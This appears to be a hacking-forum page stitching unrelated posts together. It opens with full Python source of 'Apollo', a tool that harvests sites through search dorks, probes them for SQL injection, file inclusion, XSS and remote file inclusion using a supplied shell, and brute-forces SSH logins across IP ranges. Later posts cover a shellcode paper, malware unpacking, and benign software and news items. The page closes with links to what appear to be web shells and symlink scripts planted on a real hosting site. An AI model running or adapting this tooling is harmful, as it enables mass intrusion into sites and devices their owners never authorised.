A scanner written in python, can dork for SQLI, LFI,XSS,RFI vulns and perform other scans. Apollo.py - Python Vulnerability Scanner V1 - Written by Sotd - twitter.com/#!/Sotd_ Usage: python Apollo.py _____ _ _ / ___| | | | | \ `--. ___ | |_ __| | `--. \/ _ \| __|/ _` | /\__/ / (_) | |_ (_| | \____/ \___/ \__|\__,_| ################################################# # | # # \ _ / # # Welcome to Apollo -= (_) =- # #Options: / \ # #[1] Sqli | # #[2] Lfi # #[3] Xss # #[4] Rfi # #[5] Routers # #[6] Admin Page Finder # #[7] Sub Domain Scan # #[8] Dictionary MD5 cracker # #[9] Online MD5 cracker # #[10] Check IP # ################################################# [python]#!/usr/bin/env python """ Apollo.py - Python Vulnerability Scanner V1 - Written by Sotd - twitter.com/#!/Sotd_ """ #For dorks don't include inurl: , Eg: Enter your dork: main.php?id= import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko #Router option requires the paramiko module for shh connections. PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp == 256: tmp = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nScanning Ask...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'Sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("You have an error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "MySql: " + url write = open(self.file, "a+") write.write(' [SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print 'Dupe: ' + url else: print "MsSql: " + url write = open ('[SQLI]: ' + self.file, "a+") write.write(url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'Lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Lfi: " + url write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """"><script>alert('xss')</script>""" self.file = 'Xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("<script>alert('xss')</script>", data, re.I)): self.xss(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Xss: " + url write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'Rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): #Or change to whatever is going to be in your shell for sure. self.rfi(link) vuln += 1 else: print link + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Rfi: " + url write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print 'Found: ' + site class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + ' Vulnerable Sites Found' print '>> ' + str(invuln) + ' Sites Not Vulnerable' print '>> ' + str(np) + ' Sites Without Parameters' if option == '1': print '>> Output Saved To Sqli.txt\n' elif option == '2': print '>> Output Saved To Lfi.txt' elif option == '3': print '>> Output Saved To Xss.txt' elif option == '4': print '>> Output Saved To Rfi.txt' def main(): """Outputs Menu and gets input""" red = "\033[01;31m{0}\033[00m" quotes = [ '\n"Three things cannot be long hidden: the sun, the moon, and the truth."\n', '\n"Nothing holds it together except an idea which is indestructible"\n', '\n"I am not a liberator. Liberators do not exist. The people liberate themselves."\n', '\n"Heresy is just another word for freedom of thought".\n', '\n"The tragedy of modern war is that the young men die fighting each other - instead of their real enemies back home in the capitals"\n', '\n"A man is no less a slave because he is allowed to choose a new master once in a term of years."\n' ] print red.format(''' _____ _ _ / ___| | | | | \ `--. ___ | |_ __| | `--. \/ _ \| __|/ _` | /\__/ / (_) | |_ (_| | \____/ \___/ \__|\__,_| ################################################# # | # # \ _ / # # Welcome to Apollo -= (_) =- # #Options: / \ # #[1] Sqli | # #[2] Lfi # #[3] Xss # #[4] Rfi # #[5] Routers # #[6] Admin Page Finder # #[7] Sub Domain Scan # #[8] Dictionary MD5 cracker # #[9] Online MD5 cracker # #[10] Check IP # ################################################# ''') global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print red.format(choice(quotes)) elif option == '2': Crawl() output() print red.format(choice(quotes)) elif option == '3': Crawl() output() print red.format(choice(quotes)) elif option == '4': Crawl() output() print red.format(choice(quotes)) elif option == '5': Ip() print red.format(choice(quotes)) elif option == '6': admin() aprint() print red.format(choice(quotes)) elif option == '7': subd() print red.format(choice(quotes)) elif option == '8': word() print red.format(choice(quotes)) elif option == '9': OnlineCrack().crack() print red.format(choice(quotes)) elif option == '10': Check().grab() print red.format(choice(quotes)) else: print '\nInvalid Choice\n' time.sleep(0.5) main() else: print '\nYou Must Enter An Option\n' time.sleep(0.5) main() if __name__ == '__main__': main()[/python] http://pastebin.com/RpvfXiF9 <--- Apollo http://pastebin.com/HekBD2d6 <--- Sample Results Download mirror Source
-
Eureka is a binary static analysis preparation framework. It implements a novel binary unpacking strategy based on statistical bigram analysis and coarse-grained execution tracing. Eureka incorporates advanced API deobfuscation capabilities to facilitate the structural analysis of the underlying malware logic. For each uploaded binary, the Eureka service will attempt to unpack and (for Eureka I, disassemble; for Eureka II (not yet available), decompile) the binary, and will produce an annotated callgraph, subroutine/data index page, strings summary, and a list of embedded DNS entries. Notice: The data on this website is for research purposes only. It is provided for your personal use only and is supplied AS IS, without warranty of any kind. Use or reliance on this data is at your own risk. Development Team: Monirul Sharif (Georgia Tech), Vinod Yegneswaran (SRI), Hassen Saidi (SRI), Phillip Porras (SRI), Arvind Naryanan (UTexas Austin) Eureka Malware Analysis Page
-
A research group at Tokyo Institute of Technology is developing a system that quickly creates 3D spacial data from photos taken with a digital camera. This system uses SfM, or Structure from Motion, which estimates the 3D shape and camera position from several pictures of the same scene. To reproduce spatial position data, it repeatedly identifies and matches characteristic points between two pictures. The group has achieved an efficient 3D restoration method, by detecting pictures that aren't suitable and doing overall optimization in line with the cumulative error. Via: DigInfo TV
-
- 1
-
Alphanumeric shellcode is similar to ascii shellcode in that it is used to bypass character filters and evade intrusion-detectionduring buffer overflow exploitation This article documents alphanumeric code on multiple architectures, but primarily the 64 bit x86 architecture. Alphanumeric shellcode requires a basic understanding of bitwise math, assembly and shellcode Contents 1 Available x86_64 instructions 2 Alphanumeric opcode compatibility 2.1 Alphanumeric inter-compatible x86 opcodes 2.2 15 byte architecture detection shellcode 3 Alphanumeric x86_64 register value and data manipulation 3.1 Push: alphanumeric x86_64 registers 3.2 Pop: alphanumeric x86_64 registers 3.3 Prefixes 3.4Operands 3.5 The rbx, rsp, and rbp registers 3.6 Xor 3.7 The rsi and rdi registers 3.8 Example: ZeroingOut x86_64 CPURegisters 4 64 bit shellcode:Conversion to alphanumeric code 4.1 bof.c 4.2 Starting shellcode (64-bit execve /bin/sh) 4.3 Shellcode Analysis 4.4 Stack Analysis 4.5 TheOffset 4.6 The Syscall 4.7 Arguments 4.7.1 Stack Space 4.7.2 Register Initialization 4.7.3 String Argument 4.7.4 Final Registers 4.8 Final Code 4.9 Successful OverflowTest Download: http://dl.packetstormsecurity.net/papers/shellcode/alpha.pdf Alphanumeric Shellcode ? Packet Storm
-
Today we are proud to launch a new Mozilla Webmaker app to the world. Meet Thimble, the new tool that makes it incredibly simple for anyone to create and share their own web pages and other projects in minutes. Thimble is webmaking made easy. It’s an intuitive visual editor that lets you write and edit HTML right in your browser, preview and correct your work, and then publish and share fully functional web pages with a single click. Thimble removes many of the barriers for novice users trying to learn code, and includes a series of starter projects and templates to help anyone get started quickly. Wired Webmonkey calls Thimble “one of the friendliest, easiest-to-use code editors we’ve seen.” We’re extremely excited about it, and it’s at the heart of Mozilla Webmaker’s mission to move people from using the web to making the web — and to create a more web literate planet. source: Introducing Thimble: webmaking made easy | The Mozilla Blog
-
Autofill forms Tired of filling out web forms with the same information time and time again? The Autofill feature lets you complete forms with just one click. How to use Autofill Your address information is stored in Google Chrome. The first time you fill out a form, Google Chrome automatically saves the contact information that you enter, like your name, address, phone number, or email address, as an Autofill entry. You can store multiple addresses as separate entries. Credit card information can also be securely stored. The browser can save your credit card information, with your explicit permission. When you enter credit card information on a form, Google Chrome asks you at the top of the page whether you'd like to save the information. Click Save info if you'd like the credit card to be saved as an Autofill entry. It takes just one click to fill out a form. When you start filling out a form, the Autofill entries that match what you're typing appear in a menu. Select an entry to automatically complete the form with information from the entry. Google Chrome also saves the text you've typed in specific form fields. The next time you fill out the same field, text that you've typed in the past appears in a menu. Just select the text you want to use from the menu to insert it directly into the field. Preview a form before you fill it out. To see how Google Chrome will complete a form before it actually fills it out, hover over an Autofill entry in the menu with your mouse. The fields that can be automatically completed are highlighted in yellow. Manage your Autofill entries Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Click Manage Autofill settings. In the dialog that appears, you can create as many profiles as you'd like: To save a new address entry, scroll to the end of the "Addresses" section and click Add new street address. To save a new credit card entry, scroll to the end of the "Credit Cards" section and click Add new credit card. To edit an existing entry, double-click it in the list to open the editing dialog. To delete an existing entry, select it from the list and click the x that appears at the end of the row. If you're using a Mac, addresses from your Address Book are included as potential Autofill matches by default. If you'd prefer not to see those addresses, deselect the "Include addresses from my Address Book" checkbox. Delete your form data Delete all Autofill entries and saved text Click the wrench icon on the browser toolbar. Select Tools. Select Clear browsing data. In the dialog that appears, select the "Clear saved Autofill form data" checkbox. Use the menu on the top to select the amount of data you want to delete. Select the beginning of time to clear everything. Click Clear browsing data. Delete specific Autofill entries Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Click Manage Autofill settings. In the dialog that appears, select the entry you'd like to delete from the list. Click the x that appears at the end of the row. Delete specific saved text When you type in a form field, a menu may appear, containing past text that you've typed in the field. To delete a specific piece of saved text, select it in the menu using the arrows on your keyboard, then press Shift+Delete. Enable or disable Autofill Autofill is typically turned on by default. Follow the steps below to disable it. Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Deselect the "Enable Autofill to fill out web forms in a single click" checkbox. https://support.google.com/chrome/bin/answer.py?hl=en&answer=142893&p=settings_autofill
-
FireSSH 0.90 by Mime ?uvalo FireSSH is a free, cross-platform SSH terminal client for Mozilla Firefox. Written entirely in Javascript! Download https://addons.mozilla.org/en-US/firefox/addon/firessh/
-
Version 1.0 Author: Falko Timme <ft [at] falkotimme [dot] com> Last edited 10/24/2008 dmidecode is a tool for dumping a computer's DMI (some say SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision. Thanks to this table, you can retrieve this information without having to probe for the actual hardware. Take a look at man dmidecode to find out all options. The most common option is the --type switch which takes one or more of the following keywords: bios, system, baseboard, chassis, processor, memory, cache, connector, slot You can as well specify one or more of the following numbers: Each keyword is equivalent to a list of type numbers: Here are a few sample outputs from one of my servers: dmidecode --type bios dmidecode --type system dmidecode --type baseboard dmidecode --type chassis dmidecode --type processor dmidecode --type memory dmidecode --type cache dmidecode --type connector dmidecode --type slot http://www.howtoforge.com/dmidecode-finding-out-hardware-details-without-opening-the-computer-case
-
This article explains how to monitor a Linux systems network interfaces. Install BMon using the following command: apt-get install bmon Now run “bmon” to see something similar to the following: When running, you can select the interface to monitor and press “g” to see a active graph. Network Bandwidth Monitoring With BMon | AGIX Linux
-
Facebook cump?r? Opera ?i lanseaz? propriul web browser Dac? ultimele zvonuri se adeveresc, Facebook este pe cale s? achizi?ioneze Opera Software, urmând ca versiunile desktop ?i mobile ale web browser-ului cu acela?i nume s? devin? funda?ie pentru primul web browser Facebook, creat special pentru adep?ii re?elei de socializare. Facebook browser ar urma s? includ? componente plugin ?i meniuri Facebook, ce îmbog??esc sesiunile de web browsing cu elemente specifice re?elei de socializare, cum ar fi recomandarea paginilor interesante pe Facebook, postarea de imagini ?i comentarii. Aparent, scopul final este cel de a promova re?eaua Facebook de la statutul de simplu website pe care îl vizit?m, la cel de experien?? web, în care func?iile re?elei de socializare sunt accesibile permanent, indiferent de website-ul pe care îl r?sfoim. Dat? fiind popularitatea de care se bucur? în prezent Opera Mobile, adaptarea acestuia pentru Facebook browser are ?anse mari de reu?it?, rezultatul fiind un web browser chiar ?i mai atr?g?tor pentru cei 900 milioane de adep?i ai re?elei de socializare. Odat? cu lansarea unui web browser propriu, Facebook va intra într-o competi?ie pe dou? fronturi cu Google, de?in?torul re?elei Google+ ?i web browser-ul Chrome - recent avansat la statutul de cel mai folosit browser web, în defavoarea Internet Explorer. Dac? pân? acum Google+ avansa cu pa?i mici în lumea re?elelor de socializare, Facebook browser va complica ?i mai mult lucrurile, for?ând Google c?tre strategii ?i mai agresive de promovare, cum ar fi integrarea func?iilor Google+ cu web browser-ul Chrome, Sursa: Facebook cump?r? Opera ?i lanseaz? propriul web browser
-
http://bestinternetwebhosting.com/kt/sym.php [+] Symlink script[+] http://bestinternetwebhosting.com/kt/bomba/ [+] Symlink dir[+] http://bestinternetwebhosting.com/kt/cgishell/itsecteam.php [+] shell /dir/ [+] http://bestinternetwebhosting.com/kt/sym.php?sws=sym [+] User & Domains & Symlink [+] via cr0wn at r00tworkm